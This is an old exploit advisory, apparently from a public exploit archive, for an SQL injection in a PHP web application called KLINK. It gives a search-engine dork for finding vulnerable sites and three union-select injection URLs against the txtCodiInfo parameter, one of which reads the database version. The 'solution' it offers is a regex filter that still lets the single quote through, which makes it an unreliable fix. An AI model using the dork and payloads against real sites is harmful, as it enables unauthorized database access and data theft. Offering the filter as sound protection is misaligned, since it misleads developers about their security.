30 lines
No EOL
1.6 KiB
Text
30 lines
No EOL
1.6 KiB
Text
##########################[Andr<64>s G<>mez]################################
|
||
> # Exploit Title : KLINK Sql Injection Vulnerability
|
||
> # Date : 2010-12-31
|
||
> # Author : Andr<64>s G<>mez
|
||
> # Software Developed by : http://www.contacto.com<http://www.contacto.com.com/>
|
||
> # Contact : gomezandres@adinet.com.uy
|
||
> # Dork : "allinurl:*.php?txtCodiInfo="
|
||
> ########################################################################
|
||
> # An attacker may execute arbitrary SQL statements on the vulnerable
|
||
> system.
|
||
> #This may compromise the integrity of your database and/or expose sensitive
|
||
> information.
|
||
> ########################################################################
|
||
> # Example 1: http://site.tld/path/interna.php?txtCodiInfo='
|
||
> # Example 2:
|
||
> http://site.tld/path/interna.php?txtCodiInfo=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10--
|
||
> # Example 3:
|
||
> http://site.tld/path/interna.php?txtCodiInfo=2+and+1=0+union+select+1,2,3,@@version,5,6,7,8,9,10--
|
||
> ########################################################################
|
||
> # Malicious users may inject SQL querys into a vulnerable
|
||
> # application to fool a user in order to gather data from them or see
|
||
> sensible information.
|
||
> ########################################################################
|
||
> # Solution:
|
||
> # $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
|
||
> # $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
|
||
> # Add them to your template index.php after the first <?php decelaration.
|
||
> ########################################################################
|
||
> # Special Thanks : HYPERNETHOST & Mauro Rossi
|
||
> ##########################[Andr<64>s G<>mez]################################ |